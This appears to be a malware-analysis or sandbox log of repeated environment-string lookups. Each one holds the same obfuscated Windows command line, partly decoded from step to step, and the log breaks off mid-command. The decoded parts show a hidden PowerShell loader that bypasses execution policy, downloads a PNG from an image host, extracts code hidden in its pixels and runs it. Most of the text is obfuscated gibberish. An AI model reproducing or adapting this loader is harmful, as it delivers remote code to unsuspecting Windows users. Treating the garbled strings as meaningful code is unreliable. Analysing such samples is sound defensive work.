Fn
Get Environment String name = ,_}~, result_out = seGCV suTd]Fl6aK. 1 @sheZVelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`kVe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66kVBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmakV11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjkVenRea3719a'+'7'+'%zEhGCVGCVkVs:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'kVng9a7'+'))['+'Fl66kVBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'kVBBQI7 Zn10..H'+'2('+'))\Fl66kVBBQI'+'GCV'+'GCVaKFl66kVBBQI37s.aEe'+'GCVGCVyZ7el1Fl66kVBBQI7,'+'Fl6'+'6kVBBQI_'+')[Fl66kVBBQImQI'+'{Fl66kVBBQI'+'_*H28+Fl66kVBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'kVBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66kVBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'kVBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').RekVlaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).RekVlaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).RekVlaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaTduE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Tdjh eqFl6NV:s3Td]V).Fl6aTd3e ) ^^^|GCVyPj4ERsheZVElTd -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NkVPjTdIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-TdQXIn'')1@ZnkVu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = '{, result_out = seGCV suTd]Fl6aK. 1 @sheZVelTdI37{DnPjy+@s%zEhETdlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_*H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaTduE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Tdjh eqFl6NV:s3Td]V).Fl6aTd3e ) ^^^|GCVyPj4ERsheZVElTd -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjTdIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-TdQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = -}#, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_*H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaLuE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Tgo True 1
Fn
Get Environment String name = $+, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3QI9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3QI9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBQI37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3QI9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3QI9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BQIVsK_X.'+'png9a7'+'))['+'Fl66pBBQI'+'mQIaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3QI9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBQI7 Zn10..H'+'2('+'))\Fl66pBBQI'+'GCV'+'GCVaKFl66pBBQI37s.aEe'+'GCVGCVyZ7el1Fl66pBBQI7,'+'Fl6'+'6pBBQI_'+')[Fl66pBBQImQI'+'{Fl66pBBQI'+'_*H28+Fl66pBBQI7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBQIGCVGCV.B-3QI9an37Dn5)*Dn6)-3QI9X]'+'1Fl66pBBQIGCV'+'GCV.aE -3QI9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBQI'+'mQI{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3QI9le:e*XbGCV).VaLuE.InFl6PjQIEVDaXmBQIanD.IqFl6NVPjQIesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3QI9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBQIAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = _'*{, result_out = seGCV suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'GCV'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`sGCVem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`sGCVe'+'m.'+'D]a4Zn'+'g.B'+'ZGCVmap11Fl] qFl6NeGCV.W'+'e3k9VDa'+'lZenGCV).'+'PjpenRea3719a'+'7'+'%zEhGCVGCVps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gaGCV2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'GCV'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'GCV'+'GCVaKFl66pBBk37s.aEe'+'GCVGCVyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_*H28+Fl66pBBk7PjyaK1{maGCV%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBkGCVGCV.B-3k9an37Dn5)*Dn6)-3k9X]'+'1Fl66pBBkGCV'+'GCV.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`sGCV'+'em.%e7'+'GCV.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEeGCVjh'+'GCV]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:e*XbGCV).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZGCVy%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|GCVyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`GCVyAjhjh -nPjGCVy]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmsGCVyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = ;`}~, result_out = set suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11Fl] qFl6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'t'+'taKFl66pBBk37s.aEe'+'ttyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_*H28+Fl66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBktt.B-3k9an37Dn5)*Dn6)-3k9X]'+'1Fl66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:e*Xbt).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZty%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|tyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = +?.,, result_out = set suL]f6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBk37s'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBk37s.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9an37Dn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhI3737en -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6N37 ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo True 1
Fn
Get Environment String name = '], result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@s%zEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhIdden -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cmd.e7E cgc oadZ/Yo True 1
Fn
Get Environment String name = [$#?, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{sTRInaEPjy{VDaTzEhA]Pjy#H).ReplaVDaE11{VDaTzEhA]Pjy98+{VDaTzEhA]Pjy8#+{VDaTzEhA]PjyDn06),{sTRInaEPjy{VDaTzEhA]PjyDn2H).ReplaVDaE11{VDaTzEhA]PjyDnDn8+{VDaTzEhA]Pjy5H+{VDaTzEhA]Pjy8Dn),{sTRInaEPjy{VDaTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aVDaTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo True 1
Fn
Get Environment String name = }\, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo True 1
Fn
Get Environment String name = *.@, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL 